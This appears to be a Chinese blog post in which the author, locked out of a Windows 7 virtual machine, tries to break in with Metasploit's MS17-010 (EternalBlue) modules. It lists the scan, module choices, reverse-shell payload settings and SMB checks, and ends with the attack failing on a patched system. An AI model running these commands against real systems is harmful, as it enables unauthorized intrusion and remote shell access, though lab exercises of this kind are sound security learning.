win7忘记密码_通过MS17-010打进去_创建管理员账户

今天用虚拟机的时候发现忘记密码了,服了,打一下,顺便记录一下sb经过。

最后是通过其本身镜像解决,或者用u盘做一个PE

✅第一步:工具准备

  • kali ( msfconsole美少妇

第二步:漏洞扫描

复制代码
nmap -p 445,3389 192.168.200.0/24 -O

本来想用08_067,改用永恒之蓝

第三步: MS17-010

🔎 打开Metasploit控制台

复制代码
msfconsole

🔎查找漏洞模块

复制代码
search eternalblue

👉 推荐选择

  • 第一次打:选择 0

    use exploit/windows/smb/ms17_010_eternalblue //use 0

这是最经典、最直接的永恒之蓝利用方式,最常用。

👉 0 模块打不进去:

  • 选择 1

    use exploit/windows/smb/ms17_010_psexec //use 1

它结合了 SMB 执行与永恒之蓝漏洞,有时能绕过部分系统限制。

👉 只检测:

  • 选择 3

    use auxiliary/scanner/smb/smb_ms17_010 //use 3

检测目标是否存在漏洞

👉 如果目标已经被种下 DoublePulsar 后门:

  • 选择 4

    use exploit/windows/smb/smb_doublepulsar_rce //use 4

利用植入的后门远程执行代码。

最佳顺序推荐(保险打法):

  1. 先用 auxiliary/scanner/smb/smb_ms17_010 扫描确认

  2. exploit/windows/smb/ms17_010_eternalblue

  3. 如果不成功,改用 exploit/windows/smb/ms17_010_psexec

像不正常情况下像我就是知道win7并且开启了445我就直接打了先说

🔎找到后使用

复制代码
use exploit/windows/smb/ms17_010_eternalblue  //use 0

🔎在 Metasploit 中,如果你想查看当前模块有哪些可设置的参数(选项),需要用命令:

设置攻击参数

cs 复制代码
set RHOSTS 192.168.200.128
set LHOST 你的攻击机IP
set LPORT 4444   # 端口随意,一般用 4444
set payload windows/x64/meterpreter/reverse_tcp

⚠ 如果目标系统是 32 位,可以改用:

cs 复制代码
set payload windows/meterpreter/reverse_tcp

查看配置是否正确:

cs 复制代码
show options

发起攻击

cs 复制代码
exploit

打不进去

选系统

还是打不进去

🔎为什么Win7(2009_2025)、开启445,结果却显示"不存在漏洞"?

🔎如何验证 SMBv1 是否真的开启?

可以用 smbclient 工具列出 Windows 共享**:**

cs 复制代码
smbclient -L //192.168.200.128 -N

如果 StateDisabled,那就无法利用永恒之蓝。

如果确认 SMBv1 被禁用,可以尝试:

攻击 SMBv2 协议相关漏洞,如:

  • SMB Signing 绕过

  • MS17-010 失败后可以尝试 ms17_010_psexec (编号1的模块)

cs 复制代码
use exploit/windows/smb/ms17_010_psexec

报错

cs 复制代码
[-] 192.168.200.128:445 - Unable to find accessible named pipe!

|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 放弃,永恒之蓝(EternalBlue)利用的是 SMBv1 协议的漏洞(MS17-010),如果目标没有开启 SMB 服务(即使开放了 445 端口),那么永恒之蓝也无法成功利用。 #### 关键点: * 445端口开放:端口 445 本身只是 SMB 服务的端口,表示目标机器上可能开放了 SMB 服务,但并不意味着 SMB 服务一定处于可用状态。如果没有启用 SMB 服务,攻击就无法进行。 * SMB 服务:攻击需要依赖 SMB 服务中的"命名管道"来进行漏洞利用。如果目标关闭了 SMB 服务或没有开放可用的命名管道,那么漏洞无法被触发。 总结起来,如果目标没有开启 SMB 服务,即使 445 端口开放,永恒之蓝也无法攻击成功 |

这个win7是打补丁的。

相关推荐
秋说43 分钟前
【区块链安全 | 第二篇】区块链概念详解
安全·架构·区块链
神马行空4 小时前
一文解读DeepSeek的安全风险、挑战与应对策略
网络·人工智能·安全·大模型·deepseek
GCKJ_08245 小时前
观成科技:海莲花利用MST投递远控木马
网络·安全·web安全
秋说6 小时前
【区块链安全 | 第三篇】主流公链以太坊运行机制
安全·区块链
火绒终端安全管理系统7 小时前
游戏MOD伴随盗号风险,仿冒网站借“风灵月影”窃密【火绒企业版V2.0】
网络·安全·游戏·网络安全·火绒安全
江沉晚呤时8 小时前
深入解析代理模式(Proxy Pattern):设计与应用
安全·c#·系统安全·.netcore
lsec9 小时前
代码注入之Hook注入
安全
QING6189 小时前
Android Jetpack Security 使用入门指南
android·安全·android jetpack